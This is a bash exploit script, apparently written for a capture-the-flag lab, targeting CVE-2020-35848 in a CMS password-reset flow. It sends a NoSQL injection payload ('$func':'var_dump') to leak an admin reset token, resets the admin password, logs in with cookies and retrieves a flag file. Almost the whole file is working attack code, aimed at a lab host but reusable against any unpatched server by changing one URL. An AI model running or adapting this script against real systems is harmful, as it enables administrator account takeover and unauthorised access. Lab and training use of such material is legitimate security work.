#!/bin/bash
# automated_exploit.sh - CVE-2020-35848 Comprehensive Exploitation

LAB_URL="http://ctf-lab.local"
ADMIN_USER="admin"
NEW_PASS="newpassword123"

echo "[*] Phase 1: Exploiting CVE-2020-35848..."

# Trigger password reset
curl -s -X POST "$LAB_URL/auth/requestreset" \
  -H "Content-Type: application/json" \
  -d "{\"user\":\"$ADMIN_USER\"}"

sleep 2

# Extract reset token via NoSQL injection
TOKEN=$(curl -s -X POST "$LAB_URL/auth/newpassword" \
  -H "Content-Type: application/json" \
  -d '{"token":{"$func":"var_dump"}}' | grep -oE 'rp-[a-f0-9]{40,}' | head -n1)

if [ -z "$TOKEN" ]; then
  echo "[!] Failed to extract reset token. Exiting."
  exit 1
fi

echo "[+] Extracted reset token: $TOKEN"

# Reset admin password
curl -s -X POST "$LAB_URL/auth/resetpassword" \
  -H "Content-Type: application/json" \
  -d "{\"token\":\"$TOKEN\",\"password\":\"$NEW_PASS\"}"

sleep 2

# Login and retrieve web application flag
curl -s -X POST "$LAB_URL/auth/login" \
  -H "Content-Type: application/json" \
  -d "{\"user\":\"$ADMIN_USER\",\"password\":\"$NEW_PASS\"}" \
  -c cookies.txt > /dev/null

WEB_FLAG=$(curl -s "$LAB_URL/collections/flag.txt" -b cookies.txt)

if [[ $WEB_FLAG == CTF* ]]; then
  echo "[+] WEB APPLICATION FLAG: $WEB_FLAG"
else
  echo "[!] Web flag not accessible. Check authentication."
fi

echo "[*] Phase 1 Complete. Manual system access required for remaining flags."
rm -f cookies.txt